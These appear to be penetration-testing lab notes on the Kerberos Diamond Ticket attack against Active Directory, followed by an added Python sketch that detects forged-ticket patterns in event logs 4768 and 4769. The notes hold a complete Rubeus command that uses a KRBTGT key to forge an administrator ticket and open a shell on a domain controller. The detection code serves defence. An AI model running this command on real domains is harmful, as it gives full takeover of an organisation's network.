Diamond Ticket
The Diamond Ticket attack decrypts a legitimate TGT, modifies it, and re-encrypts it using the AES keys of the KRBTGT account. A Golden Ticket is a TGT forging attack, whereas a Diamond Ticket is a TGT modification attack.
A diamond ticket is more opsec safe because it has:
- Valid ticket times, because a TGT issued by the DC is modified.
- A corresponding TGT request. In a golden ticket, there is no corresponding TGT request for TGS/service ticket requests, as the TGT is forged.
A diamond ticket should be chosen over a golden ticket in a real assessment.
In the command below, we modify the TGT after decryption with the user account and group we want.
# Open cmd with elevated privs
# KRBKEY is the same as the KRBTGT account's RC4/AES key
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
# This should spawn a new admin shell, from which we can get any user's shell.
winrs -r:dcorp-dc cmd
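As an added example, not part of the original notes, here is the correlation check that the opsec difference above is about: a service-ticket request (event 4769) from a client that never produced a TGT request (event 4768). The event fields, the sample events and the 10-hour window (the default TGT lifetime) are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs), modelled on Windows Security
# events 4768 (Kerberos TGT requested) and 4769 (service ticket requested).
EVENTS = [
    {"id": 4768, "time": "2024-01-10T09:00:00", "account": "alice", "ip": "10.0.0.5"},
    {"id": 4769, "time": "2024-01-10T09:00:04", "account": "alice", "ip": "10.0.0.5", "service": "cifs/dc01"},
    # Golden-ticket pattern: a service ticket is requested from a host that
    # never asked the DC for a TGT, because the TGT was forged offline.
    {"id": 4769, "time": "2024-01-10T09:15:00", "account": "administrator", "ip": "10.0.0.99", "service": "cifs/dc01"},
    # Diamond-ticket pattern: the host did obtain a real TGT (for its own
    # user), which was then decrypted and modified before the service request.
    {"id": 4768, "time": "2024-01-10T09:30:00", "account": "bob", "ip": "10.0.0.7"},
    {"id": 4769, "time": "2024-01-10T09:30:10", "account": "administrator", "ip": "10.0.0.7", "service": "cifs/dc01"},
]


def orphan_service_requests(events, window=timedelta(hours=10), match_account=False):
    """Return 4769 events with no preceding 4768 from the same client within `window`.

    Keyed on client IP alone, this is the check a golden ticket trips and a
    diamond ticket passes. With match_account=True the key also includes the
    account name, so a 4769 for a user the host never requested a TGT for is
    flagged as well.
    """
    last_tgt = {}  # key -> time of the most recent 4768 for that key
    flagged = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["ip"], ev["account"]) if match_account else ev["ip"]
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4768:
            last_tgt[key] = t
        elif ev["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or t - seen > window:
                flagged.append(ev)
    return flagged


if __name__ == "__main__":
    for ev in orphan_service_requests(EVENTS):
        print("no TGT request seen from host:", ev["ip"], ev["account"], ev["service"])
    for ev in orphan_service_requests(EVENTS, match_account=True):
        print("no TGT request for this account from host:", ev["ip"], ev["account"])
```

Run stand-alone, the IP-only check flags only the golden-ticket host (10.0.0.99); the account-aware check also flags the diamond-ticket host (10.0.0.7), because its only TGT request was for a different user.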